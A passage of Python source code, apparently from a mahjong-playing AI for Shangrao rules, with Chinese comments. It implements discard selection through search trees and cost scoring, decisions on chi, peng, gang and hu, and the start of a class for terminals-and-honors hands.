a_pengpenghu[0] not in all_MG: # 有可能已经存在于all_MG\n all_MG.append(a_pengpenghu[0])\n\n # 简化版搜索树\n if True:\n # if all_MG[0][-2]<=3:\n\n Tree = SearchTree_take(hand=self.cards, suits=self.suits, combination_sets=all_MG, king_card=self.kingCard,\n fei_king=self.fei_king)\n t1 = time.time()\n scoreDict, _ = Tree.get_discard_score()\n t2 = time.time()\n if t2 - t1 > 2.9: # 超时了\n print(\"搜索树搜索超时了!\")\n # logger.error(\"time:%i,info:%s, %s, %s\", t2 - t1, self.cards, self.suits, self.kingCard)\n king_score = 0 # 增加飞宝得分倍率1.5\n if self.kingCard in scoreDict.keys():\n king_score = scoreDict[self.kingCard]\n scoreDict = sorted(scoreDict.items(), key=lambda k: k[1], reverse=True)\n maxScoreCards = []\n # 希望给飞宝更多的分数,向听数越大飞宝概率越低,希望在接近胡牌时才会选择飞宝\n # if scoreDict != [] and king_score != 0 and king_score * 1.2 >= scoreDict[0][1]: # 9.23 增加2倍\n # return self.kingCard\n # all_MG_cp = MJ.deepcopy(all_MG)\n # print self.xts(all_MG_cp,self.suits,self.kingNum-1)[0][-2],all_MG[0][-2]\n # if self.xts(all_MG_cp,self.suits,self.kingNum-1)[0][-2]==all_MG[0][-2]:\n # w = 2\n # else:\n # w = 1.5\n # w=random.uniform(1.0,2.0)\n # print w\n # if king_score * w >= scoreDict[0][1]:\n # return self.kingCard\n # if len(all_MG[0][2])==1 and len(all_MG[0][3])==1:\n # # print \"n\",sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][3])])\n # if sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][3])])>4:\n # return self.kingCard\n # elif len(all_MG[0][2])==2:\n # if sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][2])])>2:\n # return self.kingCard\n # else:\n # if king_score * 1.5 >= scoreDict[0][1]\n for i in range(len(scoreDict)):\n if scoreDict[0][1] != 0 and scoreDict[i][1] == scoreDict[0][1]:\n maxScoreCards.append(scoreDict[i][0])\n # print ('maxScoreCards2', maxScoreCards)\n if maxScoreCards != []:\n return self.discards_w(maxScoreCards, self.leftNum, ndcards={})\n else:\n pass\n # logger.warning(\"recommond card is empty!%s,%s,%s,%s,%s\", self.cards, self.suits, self.kingCard,\n # self.discards, self.discardsOp)\n\n if True:\n path_w = self.cost(all=all_MG, suits=self.suits, left_num=self.leftNum, king_num=self.kingNum,\n king_card=self.kingCard)\n path_w.sort(key=lambda k: k[0], reverse=True)\n\n if path_w[0][-1] == []: # 已经胡牌\n\n max_remove_3N = 0\n remove_card = 0\n # flag = False\n for a in all_MG:\n if a[4] == 0:\n # flag = True\n if a[1] != []:\n for t3 in a[0] + a[1]:\n lc = self.get_effective_cards(dz_set=[[t3[1], t3[2]]])\n ln = sum([self.leftNum[translate16_33(e)] for e in lc])\n\n if ln >= max_remove_3N:\n max_remove_3N = ln\n remove_card = t3[0]\n rc = self.get_effective_cards(dz_set=[[t3[0], t3[1]]])\n rn = sum([self.leftNum[translate16_33(e)] for e in rc])\n if rn > max_remove_3N:\n max_remove_3N = rn\n remove_card = t3[2]\n elif len(a[2]) != []: # 单吊\n remove_card = a[2][0][0]\n print(\"defend_V2_2,has Hu,and out a highest rate card\", 1 / remove_card, remove_card)\n return remove_card\n out_card = self.discards_w(discards=path_w[0][-1], left_num=self.leftNum, ndcards={})\n return out_card\n # for i in range(len(all_MG)):\n # for card in set(path_w[i][1]): #todo 修改点\n # if card in discards_w.keys():\n # # todo 需要加上场面剩余牌信息\n # discards_w[card] += path_w[i][0]\n # else:\n # discards_w[card] = path_w[i][0]\n # discards_w = sorted(discards_w.items(), key=lambda k: k[1], reverse=True)\n # discards=[]\n # print (\"discards_w\", discards_w)\n # for tw in discards_w:\n # if tw[1]==discards_w[0][1]:\n # 
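\n            # NOTE (reading of the commented-out block below, kept for reference): this\n            # variant summed each candidate discard's weight over all combinations; the\n            # live path above instead scores discards through SearchTree_take and falls\n            # back to cost(), so the aggregation appears to be superseded.\n            #         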
discards.append(tw[0])\n #\n # return int(self.discards_w(discards=discards, left_num=self.leftNum, ndcards=ndcards))\n\n # else:\n # # 如果废牌区为空,使用搜索,出价值最低的2N\n # path_w = self.cost(all=all_MG, suits=self.suits, left_num=self.leftNum, king_num=self.kingNum,\n # king_card=self.kingCard)\n # path_w.sort(key=lambda k: k[0], reverse=True)\n # if path_w[0][-1] == []: # 已经胡牌\n #\n # max_remove_3N = 0\n # remove_card = 0\n # # flag = False\n # for a in all_MG:\n # if a[4] == 0:\n # # flag = True\n # if a[0] + a[1] != []:\n # for t3 in a[0] + a[1]:\n # lc = self.get_effective_cards(dz_set=[[t3[1], t3[2]]])\n # ln = sum([self.leftNum[translate16_33(e)] for e in lc])\n #\n # if ln >= max_remove_3N:\n # max_remove_3N = ln\n # remove_card = t3[0]\n # rc = self.get_effective_cards(dz_set=[[t3[0], t3[1]]])\n # rn = sum([self.leftNum[translate16_33(e)] for e in rc])\n # if rn >= max_remove_3N:\n # max_remove_3N = rn\n # remove_card = t3[2]\n # elif len(a[2]) == 1: # 单吊\n # remove_card = a[2][0][0]\n # print(\"defend_V2_2,has Hu,and out a highest rate card\", 1/remove_card,remove_card)\n # return remove_card\n #\n # out_card = self.discards_w(discards=path_w[0][-1], left_num=self.leftNum,ndcards=ndcards)\n # print (path_w)\n # print (\"out_card\", out_card)\n # return out_card\n\n def rf_info(self):\n \"\"\"\n 功能:给出出牌的一些信息\n 思路:分为3阶段,第一阶段完全孤张牌出牌策略,计算出所有组合中都包含的孤张牌,出评估值最低的孤张牌,剩余牌与孤张牌的联系性最低\n 第二阶段:没有孤张,采用搜索树计算出最佳出牌\n 第三阶段:胡牌后出牌\n :param all_combination: 组合信息\n :return: discard, scoreDict, discard_state 决策出牌,出牌等部分信息\n \"\"\"\n '''\n 第一阶段:完全孤张牌出牌策略\n 原则:出相关性最低的孤张牌,剩余牌与孤张牌的联系性最低\n 现阶段只考虑xts最小的情况\n '''\n all_combination = self.sys_info_V3(cards=self.cards, suits=self.suits, left_num=self.leftNum,\n kingCard=self.kingCard)\n\n all_same_xts = []\n # all_same_xts_and_left = []\n\n min_xts = all_combination[0][-2]\n for a in all_combination: # 获取xts相同的组合\n if a[-2] == min_xts:\n all_same_xts.append(a)\n # if a[-2] == min_xts and len(a[-1])==len(all_combination[0][-1]):\n # all_same_xts_and_left.append(a)\n all_MG = copy.copy(all_same_xts)\n\n # 移除搭子有效牌被覆盖��划分 ,可能出现3 56的情况,3会获得更多的机会123,234,333,345\n # for a in all_same_xts:\n # flag = False\n # for t1 in a[-1]:\n # if not flag:\n # for t2 in a[2] + a[3]:\n # th = copy.copy(t2)\n # th.append(t1)\n # th.sort()\n # if th in MJ.T2_HALF:\n # if t2 not in MJ.T2_HALF_T2 or (\n # t2 in [[2, 4], [6, 8], [0x12, 0x14], [0x16, 0x18], [0x22, 0x24],\n # [0x26, 0x28]] and t1 not in [1, 9, 0x11, 0x19, 0x21, 0x29]):\n # logger.info(\"remove duplication cs, %s,%s,%s\", a, t2, t1)\n # all_MG.remove(a)\n # flag = True\n # break\n\n # if all_MG == []:\n # all_MG = all_same_xts\n\n # 去重处理\n # 有效牌数量为0的组合应该被视为废牌 todo 宝还原\n if True: # 这一段是必须的!\n if self.kingNum <= 1: # 这里只考虑出牌、宝做宝吊的情况\n for a in all_MG:\n for i in range(len(a[3]) - 1, -1, -1):\n ab = a[3][i]\n efc = self.get_effective_cards([ab])\n if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 0: # 先只算有效牌数量为0\n a[3].remove(ab)\n a[-1].extend(ab)\n # logger.info(\"remove ab with low getting rate, %s,%s,%s,a=%s\", self.cards, self.suits,\n # self.kingCard, a)\n # for a in all_MG: #todo 20201013\n # a_temp = MJ.deepcopy(a)\n # for i in range(len(a_temp[3]) - 1, -1, -1):\n # ab = a_temp[3][i]\n # efc = self.get_effective_cards([ab])\n # if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 1: #先只算有效牌数量为0\n # a_temp[3].remove(ab)\n # a_temp[-1].extend(ab)\n # # logger.info(\"append ab with low getting rate, %s,%s,%s,a=%s\", self.cards, self.suits, self.kingCard, a)\n # if a_temp!=a:\n # all_MG.append(a_temp)\n all_MG = 
self.xts(all_MG, self.suits, self.kingNum)\n\n # print ('all_MG', all_MG)\n left_all_cards = [] # 全部组合的废牌集合\n\n for branch in all_MG:\n left_all_cards += branch[-1]\n unique_l = list(set(left_all_cards))\n left_cards = [] # 任何组合都包含的真正废牌\n left_cards_w = []\n need_jiang = False\n if all_MG[0][-2] == 1:\n if len(all_MG[0][0]) + len(all_MG[0][1]) + len(self.suits) == 4 and all_MG[0][-1] == 2:\n need_jiang = True\n\n for card in unique_l:\n if left_all_cards.count(card) == len(all_MG):\n left_cards.append(card)\n left_cards_w.append(\n self.left_card_weight(card=card, left_num=LEFT_NUM, need_jiang=need_jiang)) # 更新点:添加废牌权重\n if left_cards != []: # and all_MG[0][-2]>3:\n # if min(left_cards_w)<25: #当出37 5 的时候需要限制下\n # 这里也只能在搭子过多的情况下才会出,给的限制条件放宽点\n # if need_jiang or ((not need_jiang) and min(left_cards_w)<70):\n if True:\n # print('state first')\n return left_cards[left_cards_w.index(min(left_cards_w))], [], []\n\n '''\n 第二阶段\n 当unique_l不为空时,从所有废牌(unique_l)中出一张\n 如果为空,从所有的t2N中出一张\n '''\n # 在xts<3的情况下,使用搜索树\n # if all_MG[0][4] <= 3:\n if False:\n Tree = SearchTree(cards=self.cards, suits=self.suits, leftNum=self.leftNum, all=all_same_xts,\n remainNum=self.remainNum, dgtable=[1] * 34, kingCard=self.kingCard,\n feiKingNum=self.fei_king)\n scoreDict = Tree.getCardScore()\n king_score = 0\n if self.kingCard in scoreDict.keys():\n king_score = scoreDict[self.kingCard]\n scoreDict = sorted(scoreDict.items(), key=lambda k: k[1], reverse=True)\n maxScoreCards = []\n # print ('scoreDict',scoreDict)\n if scoreDict != [] and king_score * 1.5 >= scoreDict[0][1]:\n return self.kingCard\n\n for i in range(len(scoreDict)):\n # print (scoreDict[i][1],scoreDict[0][1])\n if scoreDict[i][1] == scoreDict[0][1]:\n maxScoreCards.append(scoreDict[i][0])\n print('maxScoreCards', maxScoreCards)\n print(scoreDict)\n # if maxScoreCards != []:\n # return self.discards_w(maxScoreCards, self.leftNum, ndcards={})\n\n # 加入处理概率过低的搭子的组合\n # todo 容易出现超时,增加向听数小于等于3的限制条件\n if False:\n # if all_MG[0][-2]<=3:\n supplement = []\n for a in all_MG:\n # print a\n a_copy = MJ.deepcopy(a)\n for ab in a[3]:\n efc = self.get_effective_cards([ab])\n # print ab,sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc])\n if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 1:\n a_copy[3].remove(ab)\n a_copy[-1].extend(ab)\n # logger.info(\"remove rate 0 ab,%s,%s,%s,a=%s\", self.cards, self.suits, self.kingCard, a)\n # break\n\n if len(a_copy[3]) != len(a[3]):\n supplement.append(a_copy)\n logger.info(\"supplement a1=%s,a2=%s\", a, a_copy)\n all_MG.extend(supplement)\n # print all_MG\n if False:\n # 加入碰碰胡处理 加到后面并不影响孤张出牌,只在搜索中使用碰碰胡\n rm_king = copy.copy(self.cards)\n for i in range(self.kingNum):\n rm_king.remove(self.kingCard)\n a_pengpenghu = self.pengpengHu(outKingCards=rm_king, suits=self.suits, kingNum=self.kingNum)\n if a_pengpenghu != [] and a_pengpenghu[0][-2] - 1 <= all_MG[0][-2]: # 现在用1\n if a_pengpenghu[0] not in all_MG: # 有可能已经存在于all_MG\n all_MG.append(a_pengpenghu[0])\n\n # 简化版搜索树\n if True:\n # if all_MG[0][-2]<=3:\n\n Tree = SearchTree_take(hand=self.cards, suits=self.suits, combination_sets=all_MG, king_card=self.kingCard,\n fei_king=self.fei_king)\n t1 = time.time()\n scoreDict, discard_state = Tree.get_discard_score()\n t2 = time.time()\n if t2 - t1 > 2.9: # 超时了\n pass\n # logger.error(\"time:%i,info:%s, %s, %s\", t2 - t1, self.cards, self.suits, self.kingCard)\n king_score = 0 # 增加飞宝得分倍率1.5\n if self.kingCard in scoreDict.keys():\n king_score = scoreDict[self.kingCard]\n scoreDict = sorted(scoreDict.items(), key=lambda k: 
k[1], reverse=True)\n maxScoreCards = []\n # 希望给飞宝更多的分数,向听数越大飞宝概率越低,希望在接近胡牌时才会选择飞宝\n # if scoreDict != [] and king_score != 0 and king_score * 1.2 >= scoreDict[0][1]: # 9.23 增加2倍\n # return self.kingCard\n # all_MG_cp = MJ.deepcopy(all_MG)\n # print self.xts(all_MG_cp,self.suits,self.kingNum-1)[0][-2],all_MG[0][-2]\n # if self.xts(all_MG_cp,self.suits,self.kingNum-1)[0][-2]==all_MG[0][-2]:\n # w = 2\n # else:\n # w = 1.5\n # w=random.uniform(1.0,2.0)\n # print w\n # if king_score * w >= scoreDict[0][1]:\n # return self.kingCard\n # if len(all_MG[0][2])==1 and len(all_MG[0][3])==1:\n # # print \"n\",sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][3])])\n # if sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][3])])>4:\n # return self.kingCard\n # elif len(all_MG[0][2])==2:\n # if sum([LEFT_NUM[MJ.convert_hex2index(i)] for i in self.get_effective_cards(all_MG[0][2])])>2:\n # return self.kingCard\n # else:\n # if king_score * 1.5 >= scoreDict[0][1]\n for i in range(len(scoreDict)):\n if scoreDict[0][1] != 0 and scoreDict[i][1] == scoreDict[0][1]:\n maxScoreCards.append(scoreDict[i][0])\n # print ('maxScoreCards2', maxScoreCards)\n if maxScoreCards != []:\n return self.discards_w(maxScoreCards, self.leftNum, ndcards={}), scoreDict, discard_state\n else:\n pass\n # logger.warning(\"recommond card is empty!%s,%s,%s,%s,%s\", self.cards, self.suits, self.kingCard,\n # self.discards, self.discardsOp)\n\n if True:\n path_w = self.cost(all=all_MG, suits=self.suits, left_num=self.leftNum, king_num=self.kingNum,\n king_card=self.kingCard)\n path_w.sort(key=lambda k: k[0], reverse=True)\n\n if path_w[0][-1] == []: # 已经胡牌\n\n max_remove_3N = 0\n remove_card = 0\n # flag = False\n for a in all_MG:\n if a[4] == 0:\n # flag = True\n if a[1] != []:\n for t3 in a[0] + a[1]:\n lc = self.get_effective_cards(dz_set=[[t3[1], t3[2]]])\n ln = sum([self.leftNum[translate16_33(e)] for e in lc])\n\n if ln >= max_remove_3N:\n max_remove_3N = ln\n remove_card = t3[0]\n rc = self.get_effective_cards(dz_set=[[t3[0], t3[1]]])\n rn = sum([self.leftNum[translate16_33(e)] for e in rc])\n if rn > max_remove_3N:\n max_remove_3N = rn\n remove_card = t3[2]\n elif len(a[2]) != 0: # 单吊\n remove_card = a[2][0][0]\n # print(\"defend_V2_2,has Hu,and out a highest rate card\", 1 / remove_card, remove_card)\n return remove_card, [], []\n out_card = self.discards_w(discards=path_w[0][-1], left_num=self.leftNum, ndcards={})\n return out_card, [], []\n # for i in range(len(all_MG)):\n # for card in set(path_w[i][1]): #todo 修改点\n # if card in discards_w.keys():\n # # todo 需要加上场面剩余牌信息\n # discards_w[card] += path_w[i][0]\n # else:\n # discards_w[card] = path_w[i][0]\n # discards_w = sorted(discards_w.items(), key=lambda k: k[1], reverse=True)\n # discards=[]\n # print (\"discards_w\", discards_w)\n # for tw in discards_w:\n # if tw[1]==discards_w[0][1]:\n # discards.append(tw[0])\n #\n # return int(self.discards_w(discards=discards, left_num=self.leftNum, ndcards=ndcards))\n\n # else:\n # # 如果废牌区为空,使用搜索,出价值最低的2N\n # path_w = self.cost(all=all_MG, suits=self.suits, left_num=self.leftNum, king_num=self.kingNum,\n # king_card=self.kingCard)\n # path_w.sort(key=lambda k: k[0], reverse=True)\n # if path_w[0][-1] == []: # 已经胡牌\n #\n # max_remove_3N = 0\n # remove_card = 0\n # # flag = False\n # for a in all_MG:\n # if a[4] == 0:\n # # flag = True\n # if a[0] + a[1] != []:\n # for t3 in a[0] + a[1]:\n # lc = self.get_effective_cards(dz_set=[[t3[1], t3[2]]])\n # ln = 
sum([self.leftNum[translate16_33(e)] for e in lc])\n #\n # if ln >= max_remove_3N:\n # max_remove_3N = ln\n # remove_card = t3[0]\n # rc = self.get_effective_cards(dz_set=[[t3[0], t3[1]]])\n # rn = sum([self.leftNum[translate16_33(e)] for e in rc])\n # if rn >= max_remove_3N:\n # max_remove_3N = rn\n # remove_card = t3[2]\n # elif len(a[2]) == 1: # 单吊\n # remove_card = a[2][0][0]\n # print(\"defend_V2_2,has Hu,and out a highest rate card\", 1/remove_card,remove_card)\n # return remove_card\n #\n # out_card = self.discards_w(discards=path_w[0][-1], left_num=self.leftNum,ndcards=ndcards)\n # print (path_w)\n # print (\"out_card\", out_card)\n # return out_card\n\n # 决策出牌\n def recommend_card(self):\n \"\"\"\n 推荐出牌接口\n :return: 返回最佳出牌\n \"\"\"\n all = self.sys_info_V3(cards=self.cards, suits=self.suits, left_num=self.leftNum, kingCard=self.kingCard)\n return self.defend_V2_2(all_combination=all)\n\n def hu_info(self, all, suits, kingNum):\n \"\"\"\n 功能:计算胡牌后的组合信息\n 思路:当胡牌后,综合计算出组合信息和副露中的kz,sz,jiang\n :param all: 组合信息\n :param suits: 副露\n :param kingNum: kingNum宝牌数量\n :return: kz ,sz ,jiang\n \"\"\"\n kz_suits = []\n sz_suits = []\n for suit in suits:\n if suit[0] == suit[1]:\n kz_suits.append(suit)\n else:\n sz_suits.append(suit)\n for a in all:\n kz = []\n kz.extend(kz_suits)\n sz = []\n sz.extend(sz_suits)\n\n jiang = 0x00\n\n if a[4] == 0:\n\n for kz_ in a[0] + a[2]:\n # if\n kz.append(kz_)\n for sz_ in a[1] + a[3]:\n if sz_[0] != 8:\n sz.append(sz_)\n else:\n sz.append(sz_ - 1)\n\n if kingNum != 0:\n jiang = [0, 0]\n else:\n jiang = a[2][0]\n return kz, sz, jiang\n return [], [], 0\n\n def recommend_op(self, op_card, canchi=False, self_turn=False, isHu=False):\n \"\"\"\n 功能:动作决策,包括吃碰杠胡的判断\n 思路:胡牌判断:当有杠时,判断杠是否为暗杠,是则直接杠,\n 否则判断杠后是否仍然胡牌,若是则杠,\n 否则接着判断,若本手胡牌基础分>8,则直接胡,否则杠,\n 当有多宝时,如果飞宝能在3手内胡牌,则先飞宝,不胡,否则胡\n 杠牌判断:有杠就杠\n 吃碰:采用了反向胡牌概率比较策略,若吃碰后的概率大于不执行动作的概率,则执行吃碰,否则pass\n :param op_card: 操作牌\n :param canchi: 能否吃牌权限\n :param self_turn: 是否是自己回合\n :param isHu: 是否已经胡牌\n :return: [],isHu 前者为吃碰杠的组合 后者为是否胡牌\n \"\"\"\n # 2项比较:前项计算胡牌rate,吃碰杠后计算胡牌rate比较,杠牌在不过多影响条件下都进行,其他需增加胡牌概率\n cards = self.cards\n suits = self.suits\n left_num = self.leftNum\n cards_former = copy.copy(cards)\n cards_former.append(0)\n all_former = self.sys_info_V3(cards=cards_former, suits=suits, left_num=left_num, kingCard=self.kingCard)\n print(\"recommend_op,all_former\", all_former)\n # 计算前向胡牌概率 完全局部最优策略\n path_w_former = self.cost(all=all_former, suits=suits, left_num=left_num, king_num=self.kingNum,\n king_card=self.kingCard)\n path_w_former.sort(key=lambda k: (k[0]), reverse=True)\n print(\"path_w_former\", path_w_former)\n rate_former = path_w_former[0][0] # 未执行动作的胡牌概率\n\n # 是否胡牌判断\n if isHu:\n logger.info(\"deal with Hu...\")\n # return [],True\n '''\n 补杠如果能杠胡则杠,\n 如果不能杠胡:本次手牌的分数较高则不杠直接胡,\n 如果本手牌分数为12分(最低分):如果杠了后胡牌几率陡降,不能胡了则不杠,\n 如果杠了胡牌几率仍然较大,则先杠\n '''\n\n # 暗杠补杠判断\n for card in cards:\n # 暗杠24 分必须要\n if cards.count(card) == 4:\n logger.info(\"choose AnGong,%s,%s,%s\", self.cards, self.suits, self.kingCard)\n return [card, card, card, card], False\n\n for card in cards:\n if [card, card, card] in suits: # 处理补杠\n cards_BuGang = copy.copy(cards)\n cards_BuGang.remove(card)\n all_BuGang = self.sys_info_V3(cards=cards_BuGang, suits=suits, left_num=left_num,\n kingCard=self.kingCard)\n asset = self.cost(all_BuGang, suits=suits, left_num=left_num,\n king_num=cards_BuGang.count(self.kingCard), king_card=self.kingCard)\n asset.sort(key=lambda k: (k[0]), reverse=True)\n buGangHuRate = asset[0][0]\n # 如果补杠后也能胡,则直接杠,否则算期望\n if buGangHuRate 
== 1:\n logger.info(\"choose buGang,%s,%s,%s\", self.cards, self.suits, self.kingCard)\n return [card, card, card, card], False\n else:\n return [], True\n # kz, sz, jiang = self.hu_info(all_former, self.suits, kingNum=self.kingNum)\n # if jiang == 0:\n # return [], True\n # score = Fan(kz=kz, sz=sz, jiang=jiang, fei_king=self.fei_king, using_king=0, baohuanyuan=False)\n # score = Fan(kz=kz, sz=sz, jiang=jiang, node=None, fei_king=self.fei_king)\n # 胡牌分数高,则直接胡,否则,看几率\n # if score >= 8:\n # return [], True\n # else:\n # if buGangHuRate <= rate_former * 0.5:\n # return [], True\n # else:\n # return [card, card, card, card], False\n # return [],True\n # 手中有2张宝牌,先不胡,打掉一张宝牌后3手内的胡牌概率是否超过原有期望\n if self.kingNum >= 2:\n # 如果作为宝还原,宝吊则直接胡\n # if self.kingNum == 2:\n # for a in all_former:\n # if a[4] == 0 and len(a[0]) + len(a[1]) + len(suits) == 4:\n # return [], True\n # return [], False\n\n cards_FeiBao = copy.copy(cards)\n cards_FeiBao.remove(self.kingCard)\n path_w_out1King = self.cost(all=all_former, suits=suits, left_num=left_num, king_num=self.kingNum - 1,\n king_card=self.kingCard)\n path_w_out1King.sort(key=lambda k: (k[0]), reverse=True)\n\n if path_w_out1King[0][0] * 2 < 1:\n\n return [], True\n else:\n logger.info(\"abandon hu,%s,%s,%s\", self.cards, self.suits, self.kingCard)\n return [], False\n\n # 当手牌中只剩下一个面子,宝吊的概率\n # elif (self.kingNum == 1 and len(suits) == 3):\n # rate = 0\n # for a in all_former:\n # if a[4] == 0:\n # if len(a[0]) == 1:\n # # 碰3家没有自摸\n # rate += float(self.leftNum[convert_hex2index(a[0][0][0])] * 3) / self.remainNum\n # elif len(a[1]) == 1:\n # cardSet = []\n # cardSet.extend(a[1][0])\n # if a[1][0][0] & 0x0f == 1:\n # cardSet.append(a[1][0][0] + 3)\n # elif a[1][0][0] & 0x0f == 9:\n # cardSet.append(a[1][0][0] - 1)\n # else:\n # cardSet.append(a[1][0][0] - 1)\n # cardSet.append(a[1][0][0] + 3)\n # for card in cardSet:\n # # 吃只能吃上家\n # rate += float(self.leftNum[convert_hex2index(card)]) / self.remainNum\n # if rate * 2 * 2 <= 1or self.round>=10:\n # return [], True\n # else:\n # return [], False\n\n else:\n return [], True\n\n # 杠牌限制,只杠已成型,且没有被用到的牌(在废牌区),杠牌没有分数奖励,只有多摸一张牌的机会\n # allSamexts = []\n # for a in all_former:\n # if a[4] == all_former[0][4]:\n # allSamexts.append(a)\n # 上饶麻将杠牌加分,这里直接能杠就杠\n if self_turn: # 暗杠补杠\n # 是否存在暗杠,暗杠直接杠,补杠也杠\n for card in cards:\n if cards.count(card) == 4 or [card, card, card] in suits:\n return [card, card, card,\n card], False\n # 明杠\n if cards.count(op_card) == 3:\n return [op_card, op_card, op_card, op_card], False\n # prekingcard 得分点碰牌,这里算杠牌\n\n if op_card == self.preKingCard and cards.count(op_card) == 2:\n return [op_card, op_card, op_card], False\n\n cards_add_op = copy.copy(cards)\n cards_add_op.append(op_card)\n all_later = self.sys_info_V3(cards=cards_add_op, suits=suits, left_num=left_num, kingCard=self.kingCard)\n val = [] # 记录满足条件的吃碰杠组合\n\n if canchi: # 可以吃,碰\n for a in all_later:\n t3N = a[0] + a[1]\n # 针对上饶麻将单吊处理\n if op_card not in a[-1] and (\n [op_card - 2, op_card - 1, op_card] in t3N or\n [op_card - 1, op_card, op_card + 1] in t3N or\n [op_card, op_card + 1, op_card + 2] in t3N or\n [op_card, op_card, op_card] in t3N):\n val.append(a)\n else: # 只能碰\n for a in all_later:\n if (op_card not in a[-1]) and [op_card, op_card, op_card] in a[0]:\n val.append(a)\n print(\"val\", val)\n if val != []:\n path_w_later = self.cost(all=val, suits=suits, left_num=left_num, king_num=self.kingNum,\n king_card=self.kingCard)\n # index记录有效的吃碰杠组合索引\n index = []\n for i_p in range(len(path_w_later)):\n if path_w_later[i_p][0] == 
1 and self.kingNum == 0 and all_former[0][\n 4] == 1: # 已胡牌,由于上饶麻将没有点炮胡,这里考虑下有效牌数量\n efc_cards = [] # 未操作前的有效牌数量\n max_remove_3N = 0 # 操作后,打掉一张3N的左或右边的一张牌,转变成2N后的有效牌数量\n # aa+ab or aa+aa\n for a in all_former:\n if len(a[2]) == 1 and len(a[3]) == 1:\n efc_cards.extend(self.get_effective_cards(dz_set=a[3]))\n tianHu = True\n elif len(a[2]) == 2 and len(a[3]) == 0:\n efc_cards.extend(self.get_effective_cards(dz_set=a[2]))\n tianHu = True\n else:\n tianHu = False\n if tianHu:\n if a[0] + a[1] != []:\n for t3 in a[0] + a[1]:\n lc = self.get_effective_cards(dz_set=[[t3[1], t3[2]]])\n ln = sum([left_num[translate16_33(e)] for e in lc])\n # for card in lc:\n if ln > max_remove_3N:\n max_remove_3N = ln\n rc = self.get_effective_cards(dz_set=[[t3[0], t3[1]]])\n rn = sum([left_num[translate16_33(e)] for e in rc])\n if rn > max_remove_3N:\n max_remove_3N = rn\n else:\n # print a[2][0][0]\n # 找到另一对被吃碰的牌,计算期望\n t2Ns = a[2] + a[3]\n for t2 in a[2] + a[3]:\n if op_card in self.get_effective_cards([t2]):\n t2Ns.remove(t2)\n break\n # 单吊了\n if self.leftNum[translate16_33(t2Ns[0][0])] * 2 > max_remove_3N:\n max_remove_3N = self.leftNum[translate16_33(t2Ns[0][0])]\n\n efc_num = 0 # 胡牌的有效牌数量\n efc_cards = set(efc_cards)\n for card in efc_cards:\n efc_num += left_num[translate16_33(card)]\n print(\"efc_num,max_remove_3N\", efc_num, max_remove_3N)\n if max_remove_3N < efc_num * 1.2: # or not (max_remove_3N==efc_num and len(cards)<=7): # 如果有效牌数量增加,则执行此操作\n return [], False # continue\n\n # 有宝可以打宝吊,单吊\n print(path_w_later[i_p][0], rate_former)\n if path_w_later[i_p][0] >= 1:\n path_w_later[i_p][0] = 1\n if path_w_later[i_p][0] > rate_former: # or (self.kingNum != 0 and len(cards) <= 4): #单吊\n index.append([i_p, path_w_later[i_p][0]])\n index.sort(key=lambda k: k[1], reverse=True)\n if index != []:\n for t3 in val[index[0][0]][0] + val[index[0][0]][1]: # 在最优吃碰杠组合中给出该3N,修正点,从all_later修正为val\n print(\"op_ t3\", t3)\n if op_card in t3:\n if canchi:\n return t3, False\n elif t3[0] == t3[1]:\n return t3, False\n return [], False\n\n\n# 九幺牌型类\nclass jiuyao():\n def __init__(self):\n \"\"\"\n 类变量初始化\n 存储幺九牌\n \"\"\"\n self.yaojiu_cards = [0x01, 0x09, 0x11, 0x19, 0x21, 0x29, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37]\n pass\n\n def get_yaojiu_num(self, cards=[], suits=[]):\n \"\"\"\n 计算手牌中幺九牌的数量\n 副露中若存在非幺九牌,则直接返回[-1]*34\n :param cards: 手牌\n :param suits: 副露\n :return: yaojiu_num, yaojiu_num_hand 手牌与副露中的幺九牌总数列表 手牌中的幺九牌数量\n \"\"\"\n yaojiu_num = [0] * (2 * 3 + 7) # 按位存储幺九牌的个数\n yaojiu_num_hand = [0] * (2 * 3 + 7)\n for i in suits:\n if i[0] not in self.yaojiu_cards or i[1] != i[0]:\n return [-1] * (2 * 3 + 7), yaojiu_num_hand\n else:\n yaojiu_num[self.yaojiu_cards.index(i[0])] += 3\n for i in range(13):\n yaojiu_num_hand[i] = cards.count(self.yaojiu_cards[i])\n yaojiu_num[i] += cards.count(self.yaojiu_cards[i])\n\n return yaojiu_num, yaojiu_num_hand\n\n def jiuyao_info(self, cards=[], suits=[], left_num=[]):\n \"\"\"\n 综合计算幺九牌型类相关信息\n :param cards: 手牌\n :param suits: 副露\n :param left_num: 剩余牌\n :return: {} 字典格式存储的幺九牌信息\n \"\"\"\n jiuyao_info = {}\n left_cards = []\n\n yaojiu_num, yaojiu_num_hand = self.get_yaojiu_num(cards=cards, suits=suits)\n jiuyao_info[\"yaojiu_num\"] = yaojiu_num\n jiuyao_info[\"yaojiu_num_hand\"] = yaojiu_num_hand\n # 副露中有非幺九牌,无法胡九幺\n if yaojiu_num[0] == -1:\n jiuyao_info[\"xts\"] = 14\n return jiuyao_info\n\n cards_copy = copy.copy(cards)\n for i in range(len(yaojiu_num_hand)):\n for j in range(yaojiu_num_hand[i]):\n cards_copy.remove(self.yaojiu_cards[i])\n # discards 算剩余幺九牌的数目\n\n 
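# NOTE (worked example with a made-up hand): one melded pung of 0x01 counts 3 in\n        # yaojiu_num; with six more yaojiu tiles in hand, sum(yaojiu_num) = 9 and the\n        # xts assigned below evaluates to 14 - 9 = 5.\n        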
